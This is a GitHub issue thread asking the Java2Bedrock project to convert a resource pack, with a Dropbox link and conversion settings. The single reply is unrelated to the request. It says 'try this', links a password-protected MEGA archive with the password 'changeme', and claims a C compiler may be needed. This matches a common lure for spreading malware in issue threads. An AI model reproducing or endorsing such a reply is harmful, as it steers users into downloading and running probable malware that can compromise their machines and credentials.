### ISSUE TITLE
[Pack]: dffdsf

### ISSUE THREAD

**Issue by Mysticalz420** [AZPixel-Team/Java2Bedrock#5219]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/0t7fpjdrk7jqt09aoarf0/generatedsept27night.zip?rlkey=8hdlbg4xle1ezbzqdgyf7bf4r&st=zkeon362&dl=1

### Default Assets Version

1.20.1

### Block Material

alpha_test

### Attachable Material

entity_alphatest_one_sided

### Archive Scratch Files

None

### Rename Model Files

true

### Font Conversion

None

### Armor Conversion

true

### Meg3 Fix

None

### Sounds Conversion

None

### Bow Conversion

true

### Shield Conversion

true

### Block Conversion

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by SagarChandra07** [comment]
try this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Pass: changeme

you may need to install the c compiler
